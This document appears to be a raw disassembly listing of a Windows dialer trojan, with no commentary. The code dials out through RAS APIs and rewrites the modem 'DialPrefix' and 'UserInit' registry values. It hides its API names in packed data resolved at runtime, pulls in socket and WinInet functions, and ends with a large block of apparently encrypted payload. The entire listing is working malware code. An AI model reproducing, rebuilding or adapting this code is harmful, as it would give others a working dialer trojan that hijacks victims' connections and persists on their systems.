cmp dword ptr ds:60031D4h, 0
jz loc_60028D5
cmp dword ptr ds:60031D0h, 0
jz loc_60028D5
cmp [ebp+arg_4], 6E8h
jl loc_60028D5
push offset aModem ; "modem"
push [ebp+arg_14]
call sub_6001CD1
test eax, eax
jnz loc_60028D5
mov ebx, [ebp+arg_0]
push edi
mov edi, ebx
mov ecx, 6E8h
xor eax, eax
rep stosb
pop edi
mov dword ptr [ebx], 6E8h
mov dword ptr [ebx+4], 130h
mov dword ptr [ebx+0B8h], 4
mov dword ptr [ebx+0BCh], 1
push ebx
add ebx, 1Bh
push [ebp+arg_8]
push ebx
call sub_6001BED
pop ebx
push ebx
add ebx, 3CCh
push [ebp+arg_14]
push ebx
call sub_6001BED
pop ebx
push ebx
add ebx, 3DDh
push [ebp+arg_18]
push ebx
call sub_6001BED
pop ebx
push 0
push 0
push dword ptr [ebx]
push ebx
push 6003210h
push 0
call dword ptr ds:60031D0h
test eax, eax
jnz loc_60028D5
mov ebx, [ebp+arg_0]
mov dword ptr [ebx], 41Ch
add ebx, 4
push ebx
push 6003210h
push ebx
call sub_6001BED
pop ebx
add ebx, 101h
push ebx
push [ebp+arg_8]
push ebx
call sub_6001BED
pop ebx
add ebx, 81h
mov dword ptr [ebx], 0
add ebx, 81h
push ebx
push [ebp+arg_C]
push ebx
call sub_6001BED
pop ebx
add ebx, 101h
push ebx
push [ebp+arg_10]
push ebx
call sub_6001BED
pop ebx
add ebx, 101h
mov dword ptr [ebx], 0
lea eax, [ebp+var_4]
mov dword ptr [eax], 0
push eax
push 0
push 0
push [ebp+arg_0]
push 0
push 0
call dword ptr ds:60031E0h
test eax, eax
jnz short loc_60028C5
mov eax, [ebp+var_4]
mov ds:6003340h, eax
mov ecx, 320h
loc_6002871: ; CODE XREF: sub_6002681+229�j
mov [ebp+var_10], ecx
mov ebx, [ebp+arg_0]
add ebx, 41Ch
mov [ebp+var_C], ebx
mov dword ptr [ebx], 0A0h
push ebx
push [ebp+var_4]
call dword ptr ds:60031CCh
test eax, eax
jnz short loc_60028C5
mov ebx, [ebp+var_C]
cmp word ptr [ebx+4], 2000h
jz short loc_60028AE
push 64h ; dwMilliseconds
call ds:Sleep ; Sleep
mov ecx, [ebp+var_10]
loop loc_6002871
jmp short loc_60028C5
; ---------------------------------------------------------------------------
loc_60028AE: ; CODE XREF: sub_6002681+21C�j
push 6003210h
push 0
call dword ptr ds:60031D4h
mov eax, 1
jmp short loc_60028D7
; ---------------------------------------------------------------------------
loc_60028C5: ; CODE XREF: sub_6002681+1E1�j
; sub_6002681+211�j ...
push 6003210h
push 0
call dword ptr ds:60031D4h
loc_60028D5: ; CODE XREF: sub_6002681+8B�j
; sub_6002681+98�j ...
xor eax, eax
loc_60028D7: ; CODE XREF: sub_6002681+242�j
add esp, 14h
pop ebp
retn 1Ch
sub_6002681 endp
; ---------------------------------------------------------------------------
cmp dword ptr [esp+8], 4
jz short loc_60028E8
retn 0Ch
; ---------------------------------------------------------------------------
loc_60028E8: ; CODE XREF: .code:060028E3�j
push offset byte_6002ABE
call sub_6002B9A
retn 0Ch
; ---------------------------------------------------------------------------
aModem db 'modem',0 ; DATA XREF: sub_600231F+DE�o
; sub_6002681+C5�o
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_60028FB proc near ; CODE XREF: sub_60029B0+3C�p
; sub_60029B0+50�p ...
var_84 = byte ptr -84h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 88h
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword ptr ds:60031F4h
test eax, eax
jnz loc_60029A6
mov [ebp+var_8], 0
loc_6002923: ; CODE XREF: sub_60028FB+5D�j
; sub_60028FB+A0�j
lea eax, [ebp+var_84]
push 78h
push eax
push [ebp+var_8]
push [ebp+var_4]
call dword ptr ds:6003204h
test eax, eax
jnz short loc_600299D
inc [ebp+var_8]
lea eax, [ebp+var_84]
lea ebx, [ebp+var_C]
push ebx
push eax
push [ebp+var_4]
call dword ptr ds:60031F4h
test eax, eax
jnz short loc_6002923
cmp [ebp+arg_8], 1
jz short loc_6002984
push 0Bh
push 6003344h
push 1
push 0
push offset aUserinit ; "UserInit"
push [ebp+var_C]
call dword ptr ds:60031F8h
jmp short loc_6002992
; ---------------------------------------------------------------------------
loc_6002984: ; CODE XREF: sub_60028FB+63�j
push offset aUserinit ; "UserInit"
push [ebp+var_C]
call dword ptr ds:6003208h
loc_6002992: ; CODE XREF: sub_60028FB+87�j
push [ebp+var_C]
call dword ptr ds:60031FCh
jmp short loc_6002923
; ---------------------------------------------------------------------------
loc_600299D: ; CODE XREF: sub_60028FB+42�j
push [ebp+var_4]
call dword ptr ds:60031FCh
loc_60029A6: ; CODE XREF: sub_60028FB+1B�j
add esp, 88h
pop ebp
retn 0Ch
sub_60028FB endp
; =============== S U B R O U T I N E =======================================
sub_60029B0 proc near ; CODE XREF: sub_60024DA+5F�p
; sub_60024DA+85�p
arg_0 = dword ptr 4
cmp dword ptr ds:60031F4h, 0
jz short locret_6002A2D
cmp dword ptr ds:60031FCh, 0
jz short locret_6002A2D
cmp dword ptr ds:6003204h, 0
jz short locret_6002A2D
cmp dword ptr ds:60031F8h, 0
jz short locret_6002A2D
cmp dword ptr ds:6003208h, 0
jz short locret_6002A2D
mov eax, [esp+arg_0]
push eax
push offset aSystemCurrentc ; "System\\CurrentControlSet\\Services\\Class"...
push 80000001h
call sub_60028FB
mov eax, [esp+arg_0]
push eax
push offset aSystemCurrentc ; "System\\CurrentControlSet\\Services\\Class"...
push 80000002h
call sub_60028FB
mov eax, [esp+arg_0]
push eax
push offset aSystemCurren_0 ; "System\\CurrentControlSet\\Control\\Class\\"...
push 80000001h
call sub_60028FB
mov eax, [esp+arg_0]
push eax
push offset aSystemCurren_0 ; "System\\CurrentControlSet\\Control\\Class\\"...
push 80000002h
call sub_60028FB
locret_6002A2D: ; CODE XREF: sub_60029B0+7�j
; sub_60029B0+10�j ...
retn 4
sub_60029B0 endp
; ---------------------------------------------------------------------------
aSystemCurrentc db 'System\CurrentControlSet\Services\Class\Modem',0
; DATA XREF: sub_60029B0+32�o
; sub_60029B0+46�o ...
aSystemCurren_0 db 'System\CurrentControlSet\Control\Class\{4D36E96D-E325-11CE-BFC1-0'
; DATA XREF: sub_60029B0+5A�o
; sub_60029B0+6E�o ...
db '8002BE10318}',0
aSettings db 'Settings',0 ; DATA XREF: sub_6002ACC+63�o
aUserinit db 'UserInit',0 ; DATA XREF: sub_60028FB+79�o
; sub_60028FB:loc_6002984�o
byte_6002ABE db 0 ; DATA XREF: .code:loc_60028E8�o
aDialprefix db 'DialPrefix',0 ; DATA XREF: sub_6002ACC+96�o
db ',',0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_6002ACC proc near ; CODE XREF: sub_6002B9A+57�p
; sub_6002B9A+69�p ...
var_84 = byte ptr -84h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 88h
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword ptr ds:60031F4h
test eax, eax
jnz loc_6002B90
mov [ebp+var_8], 0
loc_6002AF4: ; CODE XREF: sub_6002ACC+5D�j
; sub_6002ACC+7E�j ...
lea eax, [ebp+var_84]
push 6Eh
push eax
push [ebp+var_8]
push [ebp+var_4]
call dword ptr ds:6003204h
test eax, eax
jnz short loc_6002B87
inc [ebp+var_8]
lea eax, [ebp+var_84]
lea ebx, [ebp+var_C]
push ebx
push eax
push [ebp+var_4]
call dword ptr ds:60031F4h
test eax, eax
jnz short loc_6002AF4
lea eax, [ebp+var_10]
push eax
push offset aSettings ; "Settings"
push [ebp+var_C]
call dword ptr ds:60031F4h
test eax, eax
jz short loc_6002B4C
push [ebp+var_C]
call dword ptr ds:60031FCh
jmp short loc_6002AF4
; ---------------------------------------------------------------------------
loc_6002B4C: ; CODE XREF: sub_6002ACC+73�j
push [ebp+arg_8]
call sub_6001C23
push eax
push [ebp+arg_8]
push 1
push 0
push offset aDialprefix ; "DialPrefix"
push [ebp+var_10]
call dword ptr ds:60031F8h
push [ebp+var_10]
call dword ptr ds:60031FCh
push [ebp+var_C]
call dword ptr ds:60031FCh
jmp loc_6002AF4
; ---------------------------------------------------------------------------
loc_6002B87: ; CODE XREF: sub_6002ACC+42�j
push [ebp+var_4]
call dword ptr ds:60031FCh
loc_6002B90: ; CODE XREF: sub_6002ACC+1B�j
add esp, 88h
pop ebp
retn 0Ch
sub_6002ACC endp
; =============== S U B R O U T I N E =======================================
sub_6002B9A proc near ; CODE XREF: .code:060028ED�p
var_78 = byte ptr -78h
var_77 = byte ptr -77h
arg_0 = dword ptr 4
cmp dword ptr ds:60031F4h, 0
jz locret_6002C2F
cmp dword ptr ds:60031FCh, 0
jz short locret_6002C2F
cmp dword ptr ds:6003204h, 0
jz short locret_6002C2F
cmp dword ptr ds:60031F8h, 0
jz short locret_6002C2F
cmp dword ptr ds:6003208h, 0
jz short locret_6002C2F
sub esp, 78h
mov [esp+78h+var_78], 44h
mov [esp+78h+var_77], 0
mov ebx, [esp+78h+arg_0]
mov eax, esp
push ebx
push eax
call sub_6001C69
mov eax, esp
push eax
push offset aSystemCurrentc ; "System\\CurrentControlSet\\Services\\Class"...
push 80000001h
call sub_6002ACC
mov eax, esp
push eax
push offset aSystemCurrentc ; "System\\CurrentControlSet\\Services\\Class"...
push 80000002h
call sub_6002ACC
mov eax, esp
push eax
push offset aSystemCurren_0 ; "System\\CurrentControlSet\\Control\\Class\\"...
push 80000001h
call sub_6002ACC
mov eax, esp
push eax
push offset aSystemCurren_0 ; "System\\CurrentControlSet\\Control\\Class\\"...
push 80000002h
call sub_6002ACC
add esp, 78h
locret_6002C2F: ; CODE XREF: sub_6002B9A+7�j
; sub_6002B9A+14�j ...
retn 4
sub_6002B9A endp
; =============== S U B R O U T I N E =======================================
sub_6002C32 proc near ; CODE XREF: sub_600183B+48�p
; sub_60018DF+C�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
sub esp, 10h
push esp ; lpSystemTime
call ds:GetSystemTime ; GetSystemTime
sub [esp+10h+var_10], 7B4h
jl loc_6002CD0
xor edx, edx
xor eax, eax
mov ax, [esp+10h+var_10]
mov ebx, 4
div ebx
test edx, edx
jz short loc_6002C64
cmp [esp+10h+var_E], 1
jle short loc_6002C64
inc eax
loc_6002C64: ; CODE XREF: sub_6002C32+27�j
; sub_6002C32+2F�j
mov ecx, eax
xor eax, eax
mov ax, [esp+10h+var_10]
mov ebx, 16Dh
mul ebx
add eax, ecx
cmp [esp+10h+var_E], 0Ch
jg short loc_6002CD0
xor ebx, ebx
mov bx, [esp+10h+var_E]
add ebx, offset byte_6002CD3
xor ecx, ecx
mov cx, [ebx-2]
add eax, ecx
mov cx, [esp+10h+var_A]
add eax, ecx
mov ebx, 18h
mul ebx
mov cx, [esp+10h+var_8]
add eax, ecx
mov ebx, 3Ch
mul ebx
mov cx, [esp+10h+var_6]
add eax, ecx
mul ebx
mov cx, [esp+10h+var_4]
add eax, ecx
xor ebx, ebx
mov bx, [esp+10h+var_E]
xor ecx, ecx
mov cx, [esp+10h+var_A]
add esp, 10h
retn
; ---------------------------------------------------------------------------
loc_6002CD0: ; CODE XREF: sub_6002C32+10�j
; sub_6002C32+49�j
xor eax, eax
retn
sub_6002C32 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
byte_6002CD3 db 0 ; DATA XREF: sub_6002C32+52�o
dd 3B001F00h, 78005A00h, 0B5009700h, 0F300D400h, 30011100h
; ---------------------------------------------------------------------------
add [esi+1], ecx
; =============== S U B R O U T I N E =======================================
sub_6002CEB proc near ; CODE XREF: start+10�p
mov esi, offset LibFileName ; "œ1"
loc_6002CF0: ; CODE XREF: sub_6002CEB+23�j
lodsd
test eax, eax
jz short locret_6002D29
mov ebp, eax
push esi ; lpLibFileName
call ds:LoadLibraryA ; LoadLibraryA
mov edi, eax
loc_6002D00: ; CODE XREF: sub_6002CEB+27�j
; sub_6002CEB:loc_6002D27�j
xor ecx, ecx
dec ecx
xor eax, eax
xchg esi, edi
repne scasb
xchg esi, edi
lodsd
test eax, eax
jz short loc_6002CF0
test edi, edi
jz short loc_6002D00
push eax
push esi ; lpProcName
push edi ; hModule
call ds:GetProcAddress ; GetProcAddress
pop ebx
mov [ebx], eax
test eax, eax
jnz short loc_6002D27
mov [ebp+0], eax
loc_6002D27: ; CODE XREF: sub_6002CEB+37�j
jmp short loc_6002D00
; ---------------------------------------------------------------------------
locret_6002D29: ; CODE XREF: sub_6002CEB+8�j
retn
sub_6002CEB endp
; ---------------------------------------------------------------------------
; char LibFileName[]
LibFileName db 'œ1',0 ; DATA XREF: sub_6002CEB�o
db 6, 57h, 49h
dd 454E494Eh, 6C642E54h, 319C006Ch, 6E490600h, 6E726574h
dd 704F7465h, 416E65h, 60031A0h, 65746E49h, 74656E72h
dd 736F6C43h, 6E614865h, 656C64h, 60031A4h, 65746E49h
dd 74656E72h, 64616552h, 656C6946h, 31A800h, 746E4906h
dd 656E7265h, 65704F74h, 6C72556Eh, 41h, 31AC0000h, 53570600h
dd 32335F32h, 6C6C642Eh, 31AC00h, 41535706h, 72617453h
dd 707574h, 60031B0h, 6B636F73h, 0B4007465h, 63060031h
dd 656E6E6Fh, 0B8007463h, 73060031h, 646E65h, 60031BCh
dd 76636572h, 31C000h, 6F6C6306h, 6F736573h, 74656B63h
dd 31C400h, 656E6906h, 64615F74h, 7264h, 0CC000000h, 52060031h
dd 50415341h, 2E323349h, 6C6C64h, 60031CCh, 47736152h
dd 6F437465h, 63656E6Eh, 61745374h, 41737574h, 31E400h
dd 73615206h, 6D756E45h, 6E6E6F43h, 69746365h, 41736E6Fh
dd 31E800h, 73615206h, 676E6148h, 417055h, 60031E0h, 44736152h
dd 416C6169h, 31DC00h, 73615206h, 6D756E45h, 72746E45h
dd 41736569h, 31D800h, 73615206h, 6D756E45h, 69766544h
dd 41736563h, 31D400h, 73615206h, 656C6544h, 6E456574h
dd 41797274h, 31D000h, 73615206h, 45746553h, 7972746Eh
dd 706F7250h, 69747265h, 417365h, 60031F0h, 43736152h
dd 656E6E6Fh, 6F697463h, 746F4E6Eh, 63696669h, 6F697461h
dd 416Eh, 0C8000000h, 54060031h, 33495041h, 6C642E32h
dd 31C8006Ch, 696C0600h, 6547656Eh, 61725474h, 616C736Eh
dd 61436574h, 417370h, 0
dd 60031F4h, 41564441h, 32334950h, 6C6C642Eh, 31F400h
dd 67655206h, 6E65704Fh, 4179654Bh, 31F800h, 67655206h
dd 56746553h, 65756C61h, 417845h, 60031FCh, 43676552h
dd 65736F6Ch, 79654Bh, 6003200h, 51676552h, 79726575h
dd 756C6156h, 41784565h, 320400h, 67655206h, 6D756E45h
dd 4179654Bh, 320800h, 67655206h, 656C6544h, 61566574h
dd 4165756Ch, 320C00h, 67655206h, 61657243h, 654B6574h
dd 4179h, 1Ch dup(0)
_code ends
;
; Imports from KERNEL32.dll
;
; Section 2. (virtual address 00003000)
; Virtual size : 00000364 ( 868.)
; Section size in file : 00000400 ( 1024.)
; Offset to raw data for section: 00002200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Externs
; _idata
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword ; CODE XREF: sub_6002CEB+D�p
; DATA XREF: sub_6002CEB+D�r
; FARPROC __stdcall GetProcAddress(HMODULE hModule,LPCSTR lpProcName)
extrn GetProcAddress:dword ; CODE XREF: sub_6002CEB+2C�p
; DATA XREF: sub_6002CEB+2C�r
; BOOL __stdcall VirtualLock(LPVOID lpAddress,SIZE_T dwSize)
extrn VirtualLock:dword ; CODE XREF: start+A�p
; DATA XREF: start+A�r
; DWORD __stdcall GetTempPathA(DWORD nBufferLength,LPSTR lpBuffer)
extrn GetTempPathA:dword ; CODE XREF: sub_6001D0B+F�p
; DATA XREF: sub_6001D0B+F�r
; UINT __stdcall GetWindowsDirectoryA(LPSTR lpBuffer,UINT uSize)
extrn GetWindowsDirectoryA:dword ; CODE XREF: sub_6001D0B+1C�p
; DATA XREF: sub_6001D0B+1C�r
; LPVOID __stdcall VirtualAlloc(LPVOID lpAddress,SIZE_T dwSize,DWORD flAllocationType,DWORD flProtect)
extrn VirtualAlloc:dword ; CODE XREF: sub_6001D3D+F�p
; DATA XREF: sub_6001D3D+F�r
; BOOL __stdcall DeleteFileA(LPCSTR lpFileName)
extrn DeleteFileA:dword ; CODE XREF: start+259�p
; DATA XREF: start+259�r
; HANDLE __stdcall CreateMutexA(LPSECURITY_ATTRIBUTES lpMutexAttributes,BOOL bInitialOwner,LPCSTR lpName)
extrn CreateMutexA:dword ; CODE XREF: start+24�p
; DATA XREF: start+24�r
; DWORD __stdcall GetLastError()
extrn GetLastError:dword ; CODE XREF: start+2A�p
; DATA XREF: start+2A�r
; void __stdcall ExitProcess(UINT uExitCode)
extrn ExitProcess:dword ; CODE XREF: start+39�p start+4F�p ...
; BOOL __stdcall WriteFile(HANDLE hFile,LPCVOID lpBuffer,DWORD nNumberOfBytesToWrite,LPDWORD lpNumberOfBytesWritten,LPOVERLAPPED lpOverlapped)
extrn WriteFile:dword ; CODE XREF: sub_6001D55+37�p
; DATA XREF: sub_6001D55+37�r
; BOOL __stdcall CreateProcessA(LPCSTR lpApplicationName,LPSTR lpCommandLine,LPSECURITY_ATTRIBUTES lpProcessAttributes,LPSECURITY_ATTRIBUTES lpThreadAttributes,BOOL bInheritHandles,DWORD dwCreationFlags,LPVOID lpEnvironment,LPCSTR lpCurrentDirectory,LPSTARTUPINFOA lpStartupInfo,LPPROCESS_INFORMATION lpProcessInformation)
extrn CreateProcessA:dword ; CODE XREF: sub_6001DEB+7D�p
; DATA XREF: sub_6001DEB+7D�r
; DWORD __stdcall WaitForSingleObject(HANDLE hHandle,DWORD dwMilliseconds)
extrn WaitForSingleObject:dword ; CODE XREF: sub_60015F4+4E�p
; sub_6001DEB+95�p
; DATA XREF: ...
; void __stdcall Sleep(DWORD dwMilliseconds)
extrn Sleep:dword ; CODE XREF: start+1E8�p start+57A�p ...
; HANDLE __stdcall CreateFileA(LPCSTR lpFileName,DWORD dwDesiredAccess,DWORD dwShareMode,LPSECURITY_ATTRIBUTES lpSecurityAttributes,DWORD dwCreationDisposition,DWORD dwFlagsAndAttributes,HANDLE hTemplateFile)
extrn CreateFileA:dword ; CODE XREF: sub_6001D55+17�p
; sub_6001D55+62�p
; DATA XREF: ...
; BOOL __stdcall CloseHandle(HANDLE hObject)
extrn CloseHandle:dword ; CODE XREF: sub_60015F4+37�p
; sub_60015F4+57�p ...
; void __stdcall GetSystemTime(LPSYSTEMTIME lpSystemTime)
extrn GetSystemTime:dword ; CODE XREF: sub_6002C32+4�p
; DATA XREF: sub_6002C32+4�r
; HANDLE __stdcall CreateEventA(LPSECURITY_ATTRIBUTES lpEventAttributes,BOOL bManualReset,BOOL bInitialState,LPCSTR lpName)
extrn CreateEventA:dword ; CODE XREF: sub_60015F4+14�p
; DATA XREF: sub_60015F4+14�r
; Section 3. (virtual address 00004000)
; Virtual size : 00000FA4 ( 4004.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00002600
; Flags C0000080: Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
_ddt segment para public 'BSS' use32
assume cs:_ddt
;org 6004000h
assume es:nothing, ss:nothing, ds:_code, fs:nothing, gs:nothing
dword_6004000 dd 41414141h, 19ED716Eh, 46D17F8Bh, 0F11DAB35h, 3D41DE62h
; DATA XREF: start:loc_6001068�o
dd 6EF50AACh, 96204AD9h, 0A85FCA0Eh, 6FFC45D6h, 0BAC450E2h
dd 0AC32832Eh, 10BCCA56h, 5CE87481h, 8071A3CEh, 3C42EF73h
dd 648F1CA7h, 0DC3044D2h, 873BAB41h, 37A16F1Ch, 0E8E95ABFh
dd 0F649D267h, 7DE8DD70h, 16B45CC6h, 0C577A484h, 8810B52Ah
dd 38DB47EAh, 0BA6F1CB4h, 0CF20D544h, 45F7734Ch, 788137CBh
dd 0B045F613h, 3F52D027h, 6DE70095h, 9B3BB5DEh, 0DB59E00Ch
dd 2EC272F7h, 0E48948B6h, 0DF458D6Fh, 2491F323h, 701E1ABDh
dd 881FAE03h, 0D873E74Fh, 55C12E9Ch, 903C0294h, 0DE6BF602h
dd 994224Eh, 0B7C066F3h, 0E30A9A2Fh, 28BDC352h, 3D8D40AFh
dd 9972DBA8h, 355FEB75h, 7DC155BEh, 0AA3543EFh, 0D5618F19h
dd 8A55E46h, 4CD165F2h, 0FD049138h, 7AC1DA6Fh, 7A254CEh
dd 0AA1C8692h, 0F865D5EFh, 75C96D8Ah, 0A2CD5BE7h, 0ED798711h
dd 19AD3A5Eh, 4DD87F88h, 0F11AA930h, 547BE667h, 0B9061CAh
dd 96204CC6h, 882EE702h, 0C9826B2h, 0B8C450FDh, 0EC159F2Ah
dd 11BECB5Fh, 5FEE7F8Ah, 0F811A3C8h, 6B1FB725h, 5ABD4BF0h
dd 9C09B5B3h, 0E860F01Dh, 3371087Eh, 0F3EC5AC7h, 0FD09976Bh
dd 29B7C06Fh, 5CE00F9Bh, 812EBBCFh, 0CD50EF7Ah, 488C12BFh
dd 0C75436D9h, 0D260E972h, 1AC3442h, 48D42ACCh, 0F603AE3Ah
dd 214CDA66h, 6DF10EF7h, 912CB3DCh, 0C451FF02h, 29C35ABEh
dd 0ED9E09BDh, 843B71Fh, 2591FE6Ch, 40EC32C4h, 8E1BA632h
dd 3944D27Eh, 67F016A3h, 973A4ADFh, 0D86FF506h, 6DFD107Fh
dd 0A9A20B98h, 0E50F9B25h, 2DF1854Eh, 5AE5739Fh, 8511BFC9h
dd 38558E76h, 7C8115A2h, 0AB3045E8h, 8A118A1Dh, 57F2641Eh
dd 7AEC56A2h, 0C835A5DFh, 25F99D5Ah, 50FD0B97h, 9D29B0C6h
dd 0CC54E40Eh, 75832AB9h, 0A2C45AE2h, 9311B423h, 5C6573Bh
dd 41D37F89h, 0F155E92Ah, 3C49D763h, 69F504AAh, 95272ADAh
dd 0C269F803h, 59923B2h, 0E19B22FDh, 0B526C175h, 0E3DDF067h
dd 5FED46B3h, 0BE2092CBh, 471D99Bh, 61C55996h, 0AC3947D3h
dd 0D965F21Bh, 90384Ah, 0B1DF6EF5h, 0F4009626h, 57DDF05Fh
dd 49826BFFh, 852FBBC5h, 0CD11A56Eh, 788513BFh, 0A5315EEFh
dd 0D17BEE16h, 1EAD3447h, 41D5678Eh, 0AD5FDE33h, 711A8539h
dd 8CCF33A3h, 0A91582E8h, 0C551B648h, 719522B6h, 0B5C057E0h
dd 0EE748326h, 7C93FE5Bh, 238819E2h, 8E18A42Eh, 7006CF7Ah
dd 6CF97AD2h, 993C49D6h, 0DD68FF0Ah, 56E52249h, 0E39E30A2h
dd 8037AA76h, 2489F6A0h, 6DD57699h, 0B4265EFDh, 781EDB47h
dd 748817A3h, 0A93643E7h, 0D4688712h, 30AA3944h, 2FBC0EC1h
dd 0FA18F15Ah, 39B4DC6Ah, 348442D4h, 9F28BECBh, 0C15CEB0Eh
dd 73822DBBh, 0FE940497h, 0DC28D14Ch, 2F45046Ah, 7E04EBBh
dd 0F11DAB7Fh, 3441D463h, 6AF403AFh, 94234FDDh, 0C26AF807h
dd 3C9922B2h, 0DBA03ACDh, 0E66CFD4Eh, 0DB8C856h, 5CE83EC0h
dd 8017A2CEh, 3540EE73h, 618B18C3h, 0AE3946D1h, 0DC64F018h
dd 5DCF4E4Bh, 0E18A35A9h, 0F69AC13h, 21B2F25Fh, 62D43E9Ch
dd 0B01D8D27h, 0CD11A542h, 7A8513BFh, 0A53156E3h, 0D17B8816h
dd 1EA93641h, 48DC628Fh, 9C339E33h, 4328B902h, 6EF8048Eh
dd 0D066AFDAh, 0C450FE0Ah, 709522B5h, 0BEAD57E2h, 0E8778329h
dd 14A1CC5Bh, 30E57A8Eh, 0D347FF6Dh, 0D758328h, 54C6FE9Dh
dd 0D87E7BE7h, 0DE68F703h, 8972349h, 0B4C36CFBh, 0D00B9827h
dd 4FDCAE61h, 5AF811FAh, 9914BCCAh, 5424A234h, 7E8810A1h
dd 0AA3742EFh, 0D2638E1Bh, 5EF46437h, 7C8831ACh, 0CFE5A40Ah
dd 6780EE5Bh, 51FC0ADFh, 9E28B0C1h, 0CA57E20Fh, 75832EBBh
dd 0C5A568D7h, 0F11AE370h, 1DA7335Dh, 3D993D96h, 0F11BA853h
dd 3E49D661h, 6AF502ADh, 0CD7F3EDAh, 913AA559h, 0ECAF1383h
dd 89F562C8h, 0E571D668h, 14BCCC56h, 5DEB7281h, 8C1CA2CAh
dd 4B29DC4Bh, 7DEE7FC3h, 0A93B47D1h, 0A12DB102h, 90382Fh
dd 0B1DF6EF5h, 0F8009626h, 76EC9C1Fh, 64B059C4h, 0B0DEDAFDh
dd 0C85AE243h, 98B3278Fh, 95016EDCh, 0D17DC254h, 18A83042h
dd 49D7668Dh, 0F108AE3Eh, 5F25E857h, 719A63F7h, 9D27B3DDh
dd 0BD19BD16h, 749C2CD3h, 0BDCB52E1h, 0ED7C822Ah, 4AF8902Bh
dd 70BC2DD8h, 0BBF99006h, 7B74E24Fh, 65F11FE3h, 98344FD6h
dd 0DE68F703h, 0A91214Bh, 0B7C167F2h, 883FAA26h, 4FDCA22Ch
dd 5AE47082h, 0CC52A3CEh, 315CEA76h, 7C811FA6h, 0AA5143EEh
dd 0D6658D1Fh, 3AD334Eh, 158716F2h, 0A952CD61h, 0D7D1E45Bh
dd 53FE3AA7h, 0AA1C86C6h, 0F865D5EFh, 75C96D8Ah, 0A0C85BE7h
dd 0ED798512h, 1BA1305Eh, 4DD87C8Fh, 0C01CA937h, 5836BE51h
dd 6AE861CAh, 89244CDAh, 0C06CB244h, 0D9923B2h, 0B9C452FCh
dd 0E7759C4Fh, 19B4C853h, 2CE87583h, 0D74BFB91h, 171BF2Ch
dd 50BAFA91h, 0E47A77E3h, 0DD64F21Eh, 496374Dh, 0B3DF6BF6h
dd 0FE0B9424h, 2ABDCA6Ah, 3CD33E98h, 0E348DEB8h, 0CE58E46Eh
dd 30C60FBAh, 0A1305EEAh, 0D07A8311h, 1ECD3742h, 4AD7658Ch
dd 0FC09AB39h, 7E3DD965h, 3BA658CAh, 0F81F828Eh, 0C261CEF8h
dd 45AD2BB5h, 8CFEB6D5h, 0A036B31Fh, 14A0CE5Ah, 40E87A81h
dd 8F1BA732h, 3A47D078h, 66F416AEh, 0F80F7AD4h, 0BF0C927Ch
dd 0A942052h, 0FC8273FEh, 0E00C9A26h, 2CBCC655h, 5A81739Eh
dd 8613B9C8h, 3555EF75h, 22F915A1h, 0FF6A1CB6h, 0E254BE4Ah
dd 309D0DA7h, 4C9125C2h, 0FB07933Eh, 26B8DC62h, 60F40892h
dd 0F856DEF1h, 0CA48816Ah, 69842CBAh, 0C4B412A4h, 0EE708511h
dd 1AA03056h, 1D8F0E82h, 0A14AF569h, 2B69EC53h, 6CF7329Fh
dd 0A2147EDFh, 0F05DCDE7h, 0CD16582h, 0BDC653FEh, 0E4799D2Fh
dd 10B5C253h, 6ED97187h, 0ED71DDA7h, 3543F318h, 23901FA5h
dd 0AF5D3F9Bh, 0D066F61Ah, 0C993A4Bh, 0C0DA6EF7h, 0A357CF7Dh
dd 1D859338h, 64D6EEADh, 0C86E8BF7h, 0CE58E773h, 7A8111BBh
dd 0A6305AE2h, 0B84FBA1Fh, 7FCC523Ch, 4AD46092h, 0BC42B33Eh
dd 244FBE1Eh, 65FB0290h, 9027B3DBh, 9A08A07Bh, 40CC7DE8h
dd 8C3A36D9h, 0ED76811Fh, 0F497FB6Bh, 71DD4AB0h, 8D19EE70h
dd 3B41D07Eh, 60F81CAFh, 0A03548D6h, 0EB89C036h, 4BA4127Fh
dd 0B5C16FB3h, 0E9099922h, 24B8C753h, 50E67397h, 8417BDCBh
dd 5CEC76h, 1FEC7E91h, 0AA28218Ah, 0C9648C1Ah, 0AC7204h
dd 48DA63F2h, 0F9049236h, 25B9D60Fh, 53FD0294h, 9A28B6C5h
dd 910B920Eh, 25D671E5h, 53AD60D7h, 0EE7BB623h, 2E90025Ah
dd 74E1496Bh, 0F155E906h, 3F49D763h, 69F500ACh, 952946DAh
dd 0C964FB04h, 0F9026B5h, 0D0F762FFh, 8714FD4Eh, 12BCC84Ah
dd 14AA6B86h, 8814A2CEh, 3443ED78h, 68E91BA6h, 0AD3A47DBh
dd 0D863FB16h, 74913D42h, 0EF8333A9h, 0C939C774h, 18822259h
dd 1CA23FABh, 862CBAC6h, 0CC5AE472h, 708D13BEh, 0A4395DEAh
dd 0D17D8C14h, 2E993745h, 2DB607E7h, 0F503B358h, 6350DF65h
dd 6DF907DBh, 9B27B3D9h, 0A050FF0Bh, 739C22BFh, 0BACA56EBh
dd 0E973832Fh, 4AF8902Bh, 70BC2DD8h, 0BBF99006h, 7B74E24Fh
dd 65F11FE3h, 973B42D2h, 0DA68F703h, 0C97264Eh, 0B4C46FF9h
dd 0D23D9D2Eh, 49DDB93Bh, 59E76FFCh, 0C70CBBC9h, 315DEB3Fh
dd 7B8F1EA6h, 0CC3443EFh, 0D6658F1Dh, 5AC3843h, 3CDE6FF3h
